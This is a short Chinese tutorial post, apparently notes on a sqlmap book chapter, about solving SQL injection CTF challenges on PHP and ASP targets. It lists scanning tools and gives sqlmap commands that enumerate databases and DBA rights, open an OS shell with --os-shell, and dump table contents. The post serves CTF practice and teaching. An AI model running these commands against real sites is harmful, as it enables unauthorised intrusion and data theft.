美文网首页
sqlmap从入门到精通-第六章-6-7 CTF中的普通SQL注

sqlmap从入门到精通-第六章-6-7 CTF中的普通SQL注

作者: 小浪崇礼 | 来源:发表于2020-08-05 10:35 被阅读0次

    6.7 CTF中的普通SQL注入题分析

    6.7.1 SQL注入解题思路

    在SQL注入的题目,基本都会有参数传入,一般主要思路如下:

    (1) 认证阅读题目,一般会给出一点提示

    (2) 对目标地址进行漏洞扫描,可以通过AWVS等工具进行漏洞扫描,如果有注入一般都能扫描出来,如果长时间扫描不出来,就不要扫描了,浪费时间

    (3) 直接目标进行手工测试,确认存在SQL注入漏洞时候,再使用sqlmap进行注入

    (4) 使用sqlmap开始注入漏洞测试

    6.7.2 SQL注入方法

    (1) 使用Havij注入工具进行url注入测试

    (2) 使用Pangonlin进行注入测试

    (3) 使用WebCruiser进行扫描并进行url注入测试

    (4) 使用sqlmap进行注入测试

    6.7.3 CTF实战PHP SQL注入

    这里思路操作套路跟之前差不多一样的,具体如下:

    1. 题目分析

    手工判断是否存在sql注入

    2. 使用sqlmap进行SQL注入测试

    (1) 使用sqlmap进行测试是否存在SQL注入

    sqlmap.py -u url

    (2) 排除系统数据库,获取所有数据

    sqlmap.py -u url -a --exclude-sysdbs

    3. 获取flag

    这题目的flag就在数据库里面

    4. 总结

    上面是至是提供思路哈,作者的实战环境,我这确实没有,并且整体操作思路很简单。

    (1) 直接获取当前数据库权限和数据库用户信息

    sqlmap.py -u url --dbs --is-dba --current-user

    (2) root账号可以直接获取webshell

    sqlmap.py -u url --os-shell

    (3) 获取数据库表

    sqlmap.py -u url -D bmfx --tables

    (4) 查看表列名

    sqlmap.py -u url -D bmfx -T info --columns

    (5) 导出数据内容

    sqlmap.py -u url -D bmfx -T info --dump

    6.7.4 CTF实战ASP SQL注入

    1. 漏洞点测试

    2. 获取数据库名称

    sqlmap.py -u url --current-db

    3. 获取表名

    sqlmap.py -u url --current-db -D tbmfx --tables

    4. 获取数据内容

    sqlmap.py -u url --current-db -D tbmfx -T dtfx --columns

    或者使用

    sqlmap.py -u url --current-db -D tbmfx -T dtfx --dump

    相关文章

      网友评论

          本文标题:sqlmap从入门到精通-第六章-6-7 CTF中的普通SQL注

          本文链接:https://www.haomeiwen.com/subject/jmrrrktx.html